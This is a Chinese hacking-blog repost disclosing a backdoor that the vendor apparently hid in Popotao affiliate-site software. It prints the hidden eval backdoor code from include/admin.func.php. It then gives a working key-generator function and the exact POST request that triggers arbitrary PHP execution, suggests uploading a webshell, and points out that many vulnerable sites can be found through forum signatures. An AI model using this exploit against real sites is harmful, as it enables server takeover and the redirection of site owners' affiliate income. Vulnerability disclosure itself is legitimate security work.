记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

泡泡淘(popotao)淘客程序官方后门

2013-02-09 01:10
泡泡淘是一个蛮不错的淘客建站程序,官方网址:http://www.popotao.com。

本人就是他们的用户之一,用他们的程序的网站是:http://www.xiaosajie.com

由于官方几个月不更新,跟不上淘宝API的更新速度,所以我想自己解决,把官方的6个ZEND加密过的PHP文件破解了。结果发现了极其恶心的事情。

在include/admin.func.php文件的最下面,发现以下代码,这是2012年9月27日的版本。妈的,ZEND加密保护版权还有网站授权认证无可厚非。但是利用加密加入后门。就太可耻了。

if ( isset( $_POST['_tks'] ) && ( $tks = trim( $_POST['_tks'] ) ) )
{
    $_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
    if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )
    {
        eval( $_POST['tao'] );
    }
    exit( );
}

后来2月4号跟官方交涉,官方还死不承认,但是在之后的几个小时内。马上更新了补丁。也就是20130204的版本。还是信不过。继续解密。发现仍不思悔改。只不过提交的参数名变了。在程序里留个后门。对用户是多么的不负责。再次鄙视。后门代码还是include/admin.func.php文件里的最下面。

if ( isset( $_POST['_MDFK'] ) && ( $tks = trim( $_POST['_MDFK'] ) ) )
{
    $_tks = explode( "|", ~base64_decode( strrev( substr( $tks, 3, 5 ). substr( $tks, 8 ) . substr( $tks, 0, 3 ) ) ) );
    if ( trim( $_tks[1] ) == "K_".date( "Y_m_d" ) && ( strpos( $_SERVER['HTTP_HOST'], trim( $_tks[0] ) ) !== FALSE || strpos( $_SERVER['SERVER_NAME'], trim( $_tks[0] ) ) !== FALSE ) )
    {
        eval( $_POST['_HkBs'] );
    }
    exit( );
}

既然对用户这么不负责,那我只有公布泡泡淘的丑陋行径了。如果只是漏洞,可以不公布利用方法,但是这里是官方留下的后门。那就一定要给出利用方法。

里用原理就是提交一个字符串,然后通过了域名和时间的验证,顺利到达eval这里。活生生的一句话后门。不搞安全的可能不知道。我只需要说,有这句代码,控制你们网站的服务器。真的没什么问题。把PID什么的改掉。你的网站就帮别人赚钱吧。

function getfuckkey($domain = ''){
	$time = 'K_'.date("Y_m_d");
	//$domain = $_SERVER['HTTP_HOST'];
	if ($domain) {
		$key = $domain.'|'.$time;
		$key2 = base64_encode(~$key);
		$key3 = strrev($key2);
		$k1 = substr( $key3, 0, 5 );
		$k2 = substr( $key3, 5, -3 );
		$k3 = substr( $key3, -3 );
		$key4 = $k3.$k1.$k2;
		return $key4;
	} else {
		return '';
	}
}
echo getfuckkey('xiaosajie.com');

这样可以得到字符串,然后post方式,注意必须POST方式提交,提交到include/admin.func.php?_MDFK={key}&_HkBs=phpinfo()

就可以查看phpinfo();或者直接上传大马,随便了。

泡泡淘的用户很多,在官方论坛里,很多人的帖子签名都有网站。随便搞就是一大堆。

本文附件上,有本人和官方的QQ对话、对话后有文件被修改的截图以及利用程序。

2月4号和官方交涉后,2月6号,我的文件就被修改过。整个网站就打不开了。不用说也能想到是什么人做的了。本文发出前,本人的xiaosajie.com已经将官方后门处理掉了,程序完全改写,xiaosajie.com已经不是泡泡淘的程序了,完全自主开发。没有后台,所以各位黑客大哥不需要来这里测试。

最后预祝大家蛇年行大运。4ngel给各位拜年了。

tm截图20130208225710.jpg大小: 17.25 KB尺寸: 500 x 70浏览: 0 次点击打开新窗口浏览全图

tm截图20130208021041.jpg大小: 196.16 KB尺寸: 452 x 500浏览: 4 次点击打开新窗口浏览全图

poposhell.php (1.98 KB, 下载次数:4, 上传时间:Fri, 08 Feb 2013 23:19:39 +0000)

知识来源: www.sablog.net/blog/archives/604/

阅读:90809 | 评论:1 | 标签:技术相关

想收藏或者和大家分享这篇好文章→复制链接地址

“泡泡淘(popotao)淘客程序官方后门”共有1条留言

  1. 小黑阔 @2013-02-09 01:38 回复

    介个……太黑了。。。

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云